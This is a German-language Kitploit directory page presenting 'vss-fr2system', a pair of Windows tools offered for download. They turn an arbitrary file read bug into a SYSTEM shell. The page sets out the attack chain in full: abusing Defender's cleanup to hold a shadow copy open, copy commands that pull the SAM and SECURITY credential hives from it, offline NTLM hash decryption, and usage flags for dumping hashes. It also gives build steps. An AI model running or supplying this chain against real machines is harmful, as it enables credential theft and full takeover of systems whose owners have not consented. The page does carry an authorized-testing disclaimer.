Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
vss-fr2system — test | Kitploit
Tools/GitHubGitHub/sailay1996/vss-fr2system
Password CrackingPrivilege EscalationVulnerability AnalysisExploitationPost-ExploitationPenetration TestingRed Teaming
GitHubsailay1996/vss-fr2system

vss-fr2system

test

Repository anzeigen
10819vor 3 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

vss-fr2system

Zwei kleine Tools, die einen Arbitrary File Read-Bug unter Windows in eine SYSTEM-Shell verwandeln.

  • vss_freeze/ — erstellt als Standardbenutzer einen Volume Shadow Copy und hält ihn offen, sodass Sie Zeit haben, die SAM-/SECURITY-/SYSTEM-Hives daraus auszulesen
  • fr2system/ — nimmt die kopierten Hives, entschlüsselt die lokalen NTLM-Hashes offline und öffnet eine SYSTEM-Shell

Zusammen mit jeder Arb-File-Read-Primitive, die als SYSTEM (oder alles, was aus \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\... lesen kann) läuft, ergibt dies eine vollständige Std-User→SYSTEM-Kette auf einem Standard-Win10/Win11-Rechner.


Hintergrund

Dies wurde aus BlueHammer extrahiert – der Win-Defender-Missbrauchsforschung, bei der wir herausfanden, dass das Ablegen einer EICAR-Datei unter einem überwachten Pfad dazu führt, dass Defender im Rahmen seines Bereinigungsablaufs einen Volume Shadow Copy erstellt. Wir hielten einen RstrtMgr.dll-Batch-Oplock auf Defenders Ladepfad, sodass Defender zu Beginn der Bereinigung pausiert bleibt, was wiederum die VSS so lange am Leben erhält, wie wir sie brauchen.

Ursprünglich gab es darauf noch einen Stage-2-cldflt-Freeze, aber cldflt lehnt Nicht-OneDrive-Sync-Anbieter unter Win11 24H2 ab (CfRegisterSyncRoot gibt 0x80070057 zurück). Es stellte sich heraus, dass es ausreicht, den Stage-1-Oplock offen zu lassen – Defender bleibt pausiert, VSS bleibt aktiv, keine Cloud Files API nötig.


Die Kette

Echte LPE (Sie haben bereits einen Arb-File-Read)

root@kitploit:~
[ vss_simple_freeze.exe ]   →   [ Ihr Arb-Read-PoC ]   →   [ fr2system.exe ]
   erstellt VSS als Std-User        liest SAM/SECURITY        knackt NTLM, öffnet SYSTEM
   hält sie via Oplock              aus dem VSS-Pfad          Shell
  1. Führen Sie vss_simple_freeze.exe --hold 120 als normaler Benutzer aus. Es gibt den VSS-Pfad aus, z.B. \Device\HarddiskVolumeShadowCopy7.
  2. Nutzen Sie Ihren Arb-File-Read-Bug, um diese aus der VSS zu lesen:
    • \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\Windows\System32\Config\SAM
    • \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\Windows\System32\Config\SECURITY
    • Speichern Sie sie als C:\Windows\Temp\fileread\SAM und C:\Windows\Temp\fileread\SECURITY.
  3. Führen Sie fr2system.exe aus. SYSTEM-Shell.

Testen ohne einen Arb-Read-Bug

Wenn Sie lediglich überprüfen möchten, ob die Kette auf Ihrem Rechner durchgängig funktioniert, simulieren Sie den Arb-Read-Schritt mit einer Admin-cmd:

root@kitploit:~
:: Fenster 1 - Standardbenutzer
vss_simple_freeze.exe --hold 300

:: Fenster 2 - Admin-cmd (simuliert die Arb-Read-Primitive)
mkdir C:\Windows\Temp\fileread
copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\Windows\System32\Config\SAM"      C:\Windows\Temp\fileread\SAM
copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\Windows\System32\Config\SECURITY" C:\Windows\Temp\fileread\SECURITY

:: Fenster 3 - wieder Standardbenutzer
fr2system.exe

(Ersetzen Sie 7 durch die Nummer, die vss_simple_freeze ausgegeben hat.)


Verwendung

vss_simple_freeze

root@kitploit:~
vss_simple_freeze.exe [Optionen]

  --hold N            Automatische Freigabe nach N Sekunden (Standard: warten auf Enter)
  --auto              Nicht-interaktiv, bis zu 600s halten
  --publish FILE      VSS-Pfad in FILE schreiben (Standard: %TEMP%\vss_current.txt)
  --no-publish        VSS-Pfad nirgendwo schreiben
  --event NAME        Freigabe, wenn das benannte Ereignis Local\NAME signalisiert wird
  --quiet             Lebendigkeitsausgabe pro Sekunde unterdrücken
  --help              Hilfe anzeigen

Beispiele:
  vss_simple_freeze.exe                              # interaktiv, Enter zum Freigeben
  vss_simple_freeze.exe --hold 120                   # automatische Freigabe nach 2 Min
  vss_simple_freeze.exe --event lpe_done --hold 300  # Freigabe bei Signal oder nach 5 Min

fr2system

root@kitploit:~
fr2system.exe [Optionen]

  (keine)              Standard – SAM/SECURITY aus C:\Windows\Temp\fileread lesen, zu SYSTEM eskalieren
  --dump               Nur NTLM-Hashes ausgeben, nicht eskalieren
  --scan               Nach alternativen Anmeldeinformationsquellen suchen
  --path DIR           Ein anderes Eingabeverzeichnis verwenden
  --help               Hilfe anzeigen

Beispiele:
  fr2system.exe
  fr2system.exe --dump
  fr2system.exe --path C:\lab\hives

fr2system.exe erwartet mindestens SAM im Eingabeverzeichnis. SECURITY ist optional (wird für LSA-Geheimnisse / DPAPI-Schlüssel verwendet).


Build

Beide Projekte verwenden MSVC (statische CRT, x64).

root@kitploit:~
cd vss_freeze
build_vss_simple_freeze.bat

cd fr2system
msbuild fr2system.sln /p:Configuration=Release /p:Platform=x64

Screenshots

VSS-Erstellung:

vss_simple_freeze-Ausführung

fr2system → SYSTEM-Shell:

fr2system-Ausführung


Hinweise

  • Getestet auf Win10 22H2 und Win11 23H2/24H2 mit aktiviertem Defender.
  • Die VSS-Technik basiert auf Defenders Bereinigungsablauf. Bei deaktiviertem oder durch ein anderes AV ersetztem Defender wird der Stage-1-Oplock nicht ausgelöst und keine VSS erstellt – wählen Sie in diesem Fall eine andere VSS-Primitive.
  • Dies ist Werkzeug für Forschung / autorisierte Pentests. Führen Sie es nicht auf Systemen aus, auf denen Sie dazu nicht berechtigt sind.
Tool herunterladen